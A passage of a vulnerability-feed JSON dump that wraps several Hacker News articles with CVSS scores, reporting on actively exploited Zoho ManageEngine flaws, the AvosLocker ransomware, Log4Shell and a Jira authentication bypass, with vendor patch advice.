{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhq1H4Rr-Xal2CT5stc98f2CNC5FoqAVXUgTeE6lsiHRSi39JatAzNIZWMSPz81BrT4zGJ4ZKnlNew3LX6Gc5DzE7Q-u4OMx1uOoJ1jLkeKAhqNhhuBBofCoPvPprhqa7Kwjs4xOGro4J2Smfu9-y5aCWImMp2AAtoBj_aoe5JFpuPMyi-MIZy8F4oq>)\n\nThe U.S. Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are warning of active exploitation of a newly patched flaw in Zoho's ManageEngine ServiceDesk Plus product to deploy web shells and carry out an array of malicious activities.\n\nTracked as [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) (CVSS score: 9.8), the issue relates to an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus versions up to and including 11305 that, if left unfixed, \"allows an attacker to upload executable files and place web shells that enable post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho>).\n\n\"A security misconfiguration in ServiceDesk Plus led to the vulnerability,\" Zoho [noted](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) in an independent advisory published on November 22. \"This vulnerability can allow an adversary to execute arbitrary code and carry out any subsequent attacks.\" Zoho [addressed](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above>) the same flaw in versions 11306 and above on September 16, 2021.\n\nCVE-2021-44077 is also the second flaw to be exploited by the same threat actor that was formerly found [exploiting](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) a security shortcoming in Zoho's self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus ([CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>)) to compromise at least 11 organizations, according to a new report published by Palo Alto Networks' Unit 42 threat intelligence team.\n\n[](<https://thehackernews.com/images/-hM1_vIvcTok/Yamv2q2qXSI/AAAAAAAA4jE/UkCg_Dr3xM40aF_fItjQ6LKcw1t-85-iQCNcBGAsYHQ/s0/timeline.jpg>)\n\n\"The threat actor expand[ed] its focus beyond ADSelfService Plus to other vulnerable software,\" Unit 42 researchers Robert Falcone and Peter Renals [said](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>). \"Most notably, between October 25 and November 8, the actor shifted attention to several organizations running a different Zoho product known as ManageEngine ServiceDesk Plus.\"\n\nThe attacks are believed to be orchestrated by a \"persistent and determined APT actor\" tracked by Microsoft under the moniker \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>),\" an emerging threat cluster that the tech giant says is operating out of China and has been previously observed exploiting a then zero-day flaw in SolarWinds Serv-U managed file transfer service earlier this year. Unit 42 is monitoring the combined activity as the \"**TiltedTemple**\" campaign.\n\nPost-exploitation activities following a successful compromise involve the actor uploading a new dropper (\"msiexec.exe\") to victim systems, which then deploys the Chinese-language JSP web shell named \"Godzilla\" for establishing persistence in those machines, echoing similar tactics used against the ADSelfService software.\n\nUnit 42 identified that there are currently over 4,700 internet-facing instances of ServiceDesk Plus globally, of which 2,900 (or 62%) spanning across the U.S., India, Russia, Great Britain, and Turkey are assessed to be vulnerable to exploitation.\n\nOver the past three months, at least two organizations have been compromised using the ManageEngine ServiceDesk Plus flaw, a number that's expected to climb further as the APT group ramps up its reconnaissance activities against technology, energy, transportation, healthcare, education, finance, and defense industries. \n\nZoho, for its part, has made available an [exploit detection tool](<https://www.manageengine.com/products/service-desk/security-response-plan.html>) to help customers identify whether their on-premises installations have been compromised, in addition to recommending that users \"upgrade to the latest version of ServiceDesk Plus (12001) immediately\" to mitigate any potential risk arising out of exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-03T05:24:00", "type": "thn", "title": "CISA Warns of Actively Exploited Critical Zoho ManageEngine ServiceDesk Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077"], "modified": "2021-12-03T13:34:13", "id": "THN:60B42277F576BB78A640A9D3B976D8D8", "href": "https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgX0lKnx5WdFoF_k4rJiFXzL8S6T7QacBw6YLYV-c3wmeack_LrSDflJj-tCiHWWDyuhvCRxff3JxsdWuCd7lCtomS2C0Mirl6h9_PazDFxXRjF9KAahOXfOCaW__Mzb9ltwXwFD0R-03BqrPy0D9gDWD-BXQOCmQdlraj-A-gPB1bJVOdRop98x2to/s728-e100/antimalware.jpg>)\n\nCybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. \n\n\"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys),\" Trend Micro researchers, Christoper Ordonez and Alvin Nieto, [said](<https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html>) in a Monday analysis.\n\n\"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap [NSE script](<https://nmap.org/book/man-nse.html>).\"\n\n[AvosLocker](<https://thehackernews.com/2021/08/researchers-warn-of-4-new-ransomware.html>), one of the newer ransomware families to fill the vacuum left by [REvil](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>), has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.\n\nA ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.\n\nOther targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an [advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware>) released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.\n\nTelemetry data gathered by Trend Micro [shows](<https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker>) that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.\n\nThe entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software ([CVE-2021-40539](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>)) to run an HTML application ([HTA](<https://en.wikipedia.org/wiki/HTML_Application>)) hosted on a remote server.\n\n\"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,\" the researchers explained.\n\nThis includes retrieving an ASPX web shell from the server as well as an installer for the [AnyDesk](<https://thehackernews.com/2021/05/malvertising-campaign-on-google.html>) remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.\n\nSome of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw ([CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints. \n\nThe batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.\n\nAlso used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company [resolved in June 2021](<https://forum.avast.com/index.php?topic=283231.0>).\n\n\"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),\" the researchers pointed out. \"This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-03T05:50:00", "type": "thn", "title": "AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-03T05:50:32", "id": "THN:E7E8D45492BAD83E88C89D34F8502485", "href": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. \"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj61Yvi82eU_SsNVfNm8WazXtxvcYXm-sCRLGmk5m-EijyMKxnX7EywsH3x3g08_XJKLrzN6v1fAWhIVPYSGdCWww6qP6J3eriq2RAyEhFEI8Q7GpR1uolW0eRgUZr8gQDOyMty2WhvSGuA8o5zI4uVLgouljVIzwLo6jec4rUwyfZxNM2dJrDTyvOE/s728-e100/jira.jpg>)\n\nAtlassian has published a security advisory warning of a critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections.\n\nTracked as [**CVE-2022-0540**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0540>), the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness.\n\n\"A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration,\" Atlassian [noted](<https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html>).\n\nThe flaw affects the following Jira products -\n\n * Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x\n * Jira Service Management Server and Jira Service Management Data Center: All versions before 4.13.18, 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, and 4.21.x\n\nFixed Jira and Jira Service Management versions are 8.13.18, 8.20.6, and 8.22.0 and 4.13.18, 4.20.6, and 4.22.0.\n\nAtlassian also noted that the flaw affects first and third-party apps only if they are installed in one of the aforementioned Jira or Jira Service Management versions and that they are using a vulnerable configuration.\n\nUsers are strongly recommended to update to one of the patched versions to mitigate potential exploitation attempts. If immediate patching isn't an option, the company is advising updating the affected apps to a fixed version or disabling them altogether.\n\nIt's worth noting that a critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild last year to [install](<https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html>) [cryptocurrency miners](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) on compromised servers.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T05:52:00", "type": "thn", "title": "Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-0540"], "modified": "2022-04-23T05:52:42", "id": "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "href": "https://thehackernews.com/2022/04/atlassian-drops-patches-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:51", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjHMcXDV_clY9qcSsKkb2OAnYKFj0UHRQhJw2hVPqXcoFYUHdOV9I1c1_n8Cts-WBNsCC5QeLRhSXMP8AXBcSxfSv7-X1u92p_NKlGh0e1T367go5qLlZP_JyRzjUIMcONyTPXffBuAVxGFdEi87vmow8jsvdsVu1kywwfDfJESNMvFBaxHuAlYmc0Q>)\n\nEnterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months.\n\nThe issue, assigned the identifier [CVE-2021-44515](<https://nvd.nist.gov/vuln/detail/CVE-2021-44515>), is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server.\n\n\"If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution,\" Zoho [cautioned](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) in an [advisory](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>). \"As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj1xx5yUi1N8hhGwCsKIe41nVNxRANWaKDVgeuBCUxVqEN45mzkSaOzVblxzHvLtCK-S72xInMv4NWD4QK3W_SCbiMYIvb1aWhb4RUPVekHI3U6EYX9pyFk2YzPaff25pZUh78cc-rh7QoowlHfpWg_XvNGJTVk5a-4xiCyFSQB1ERi9_IrQwoKwI9U>)\n\nThe company has also made available an [Exploit Detection Tool](<https://downloads.zohocorp.com/dnd/Desktop_Central/XTsIm8tSrnzjXhW/detector.zip>) that will help customers identify signs of compromise in their installations.\n\nWith this development, CVE-2021-44515 joins two other vulnerabilities [CVE-2021-44077](<https://nvd.nist.gov/vuln/detail/CVE-2021-44077>) and [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) that have been [weaponized](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) to compromise the networks of critical infrastructure organizations across the world.\n\nThe disclosure also comes a day after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) that CVE-2021-44077 \u2014 an unauthenticated, remote code execution vulnerability affecting ServiceDesk Plus \u2014 is being exploited to drop web shells and carry out an array of post-exploitation activities as part of a campaign dubbed \"TiltedTemple.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-04T05:07:00", "type": "thn", "title": "Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-04T05:09:04", "id": "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "href": "https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:42", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi_JzJRZbhmwlI8nV6xvkiS-sqhx4pz9DQL18ARUkEMQ_wOFlAYdEOdD4hlQoSB4-kzuDeFRvQMomyrIIJrBdy18WyEjmjhgJP6BXAkfU9f0Rq6tEf8fPpFqfB2ECAX-eKxA8bnmcz82Btn6m88Da1ZmVoPX2PGZ-VwDYc04o6OHV0-wKonRvpMc6UK>)\n\nEnterprise software maker Zoho on Monday issued patches for a critical security vulnerability in Desktop Central and Desktop Central MSP that a remote adversary could exploit to perform unauthorized actions in affected servers.\n\nTracked as [CVE-2021-44757](<https://nvd.nist.gov/vuln/detail/CVE-2021-44757>), the shortcoming concerns an instance of authentication bypass that \"may allow an attacker to read unauthorized data or write an arbitrary zip file on the server,\" the company [noted](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) in an advisory.\n\nOsword from SGLAB of Legendsec at Qi'anxin Group has been credited with discovering and reporting the vulnerability. The Indian firm said it remediated the issue in build version 10.1.2137.9.\n\nWith the latest fix, Zoho has addressed a total of four vulnerabilities over the past five months \u2014\n\n * [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine ADSelfService Plus\n * [CVE-2021-44077](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) \u2013 Unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ServiceDesk Plus, ServiceDesk Plus MSP, and SupportCenter Plus, and\n * [CVE-2021-44515](<https://thehackernews.com/2021/12/warning-yet-another-zoho-manageengine.html>) (CVSS score: 9.8) \u2013 Authentication bypass vulnerability affecting Zoho ManageEngine Desktop Central\n\nIn light of the fact that all the three aforementioned flaws have been exploited by malicious actors, it's recommended that users apply the updates as soon as possible to mitigate any potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 